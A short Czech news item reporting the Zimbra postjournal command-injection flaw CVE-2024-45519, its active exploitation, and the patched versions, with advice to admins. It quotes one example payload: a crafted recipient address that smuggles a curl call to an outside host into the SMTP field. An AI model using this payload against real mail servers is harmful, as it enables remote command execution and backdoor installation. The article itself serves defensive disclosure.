Zranitelnost s označením CVE-2024–45519 se nachází v e-mailovém serveru Zimbra, který používají především středně velké a velké organizace. Pokud správce ručně změní výchozí nastavení a povolí službu postjournal, mohou útočníci spustit příkazy odesláním škodlivě vytvořených e-mailů na adresu hostovanou na serveru.
Jádro problému se nachází ve způsobu, jakým binárka postjournal napsaná na jazyce C zpracovává a analyzuje e-mailové adresy příjemců ve funkci nazvané msg_handler(). Při předání speciálně vytvořené zprávy SMTP s falešnou adresou (např. "aabbb$(curl${IFS}oast.me)"@mail.domain.com umožňuje vložení příkazu do služby běžící na portu 10027.
Útočníci už kritickou zranitelnost aktivně zneužívají a snaží se vzdáleně spustit škodlivé příkazy, které instalují zadní vrátka, varují výzkumníci. Zimbra nedávno zranitelnost opravila ve verzích 8.8.15 Patch 46, 9.0.0 Patch 41, 10.0.9, a 10.1.1. Všem správcům je doporučována rychlá aktualizace nebo kontrola vypnutí zranitelné služby postjournal.
ČLÁNKY DO MAILU